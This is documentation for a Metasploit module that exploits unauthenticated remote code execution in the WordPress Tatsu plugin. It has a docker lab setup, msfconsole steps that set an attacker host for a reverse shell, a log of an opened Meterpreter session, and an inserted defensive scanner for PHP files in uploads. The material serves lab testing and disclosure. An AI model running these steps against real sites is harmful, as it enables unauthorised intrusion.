Wp Tatsu Rce

documentation/modules/exploit/multi/http/wp_tatsu_rce.md


Vulnerable Application

This module exploits an unauthenticated remote code execution vulnerability in the Tatsu plugin for WordPress. The vulnerable versions are below 3.3.11. The module uploads a malicious zip file containing a PHP payload, which the plugin parses and unzips into the WordPress upload directory. The module then triggers the payload by sending a request with the payload directory as the URI. The vulnerable plugin is available here
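The artifact this leaves behind is a PHP file (and often the archive it came from) inside `wp-content/uploads`, a directory that should never hold executable code. The following defender-side check is an added example, not part of the module or the original page: it walks an uploads directory, flags PHP-executable files and any `.zip` sitting next to a directory of the same name, and runs against a constructed sample tree in a temp directory (the file names and the `tatsu_demo` path are invented for the demo).

```python
import os
import tempfile

# Extensions that mod_php / PHP-FPM typically execute; none belong in uploads.
EXECUTABLE_EXTS = {".php", ".php5", ".php7", ".phtml", ".phar"}


def scan_uploads(uploads_dir):
    """Return sorted (finding_kind, relative_path) tuples for uploads_dir.

    Flags executable-looking files anywhere in the tree, plus the
    upload-then-unzip pattern: a .zip whose basename matches a sibling dir.
    """
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            rel = os.path.relpath(os.path.join(root, name), uploads_dir)
            if ext in EXECUTABLE_EXTS:
                findings.append(("php-in-uploads", rel))
            elif ext == ".zip" and os.path.isdir(os.path.join(root, name[:-4])):
                findings.append(("zip-with-extracted-dir", rel))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample uploads tree (not from a real site) for a demo run."""
    base = tempfile.mkdtemp(prefix="wp_uploads_")
    os.makedirs(os.path.join(base, "2025", "06"))
    os.makedirs(os.path.join(base, "tatsu_demo"))
    with open(os.path.join(base, "2025", "06", "photo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff")  # benign JPEG header stub, should not be flagged
    with open(os.path.join(base, "tatsu_demo", "shell.php"), "w") as f:
        f.write("<?php /* constructed placeholder, does nothing */ ?>")
    with open(os.path.join(base, "tatsu_demo.zip"), "wb") as f:
        f.write(b"PK\x03\x04")  # zip magic only; archive next to extracted dir
    return base


if __name__ == "__main__":
    for kind, path in scan_uploads(build_sample_tree()):
        print(f"{kind}: {path}")
```

Point `scan_uploads` at a real `wp-content/uploads` to use it as a post-incident sweep; a clean site returns an empty list.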

Verification Steps

  1. Install the application
     1.1 Create `docker-compose.yml`:

```yaml
services:

  wordpress:
    image: wordpress:6.3.2
    restart: always
    ports:
      - 5555:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: ms
      WORDPRESS_DB_PASSWORD: supersecret
      WORDPRESS_DB_NAME: proof_of_concept
    volumes:
      - wordpress:/var/www/html
      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini

  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: proof_of_concept
      MYSQL_USER: ms
      MYSQL_PASSWORD: supersecret
      MYSQL_ROOT_PASSWORD: supersecret
    volumes:
      - db:/var/lib/mysql

volumes:
  wordpress:
  db:
```

     1.2 Download the plugin
     1.3 Install the plugin in the WordPress admin portal

  1. msfconsole
  2. use multi/http/wp_tatsu_rce
  3. set RHOST [target IP]
  4. set RPORT [target PORT]
  5. set LHOST [attacker's IP]
  6. set LPORT [attacker's port]

Options

Scenarios

Vulnerable version is <= 3.3.11.

```
msf exploit(multi/http/wp_tatsu_rce) > run
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Sending stage (40004 bytes) to 172.18.0.2
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer    : ff0d55ec29bf
OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
Meterpreter : php/linux
meterpreter >
```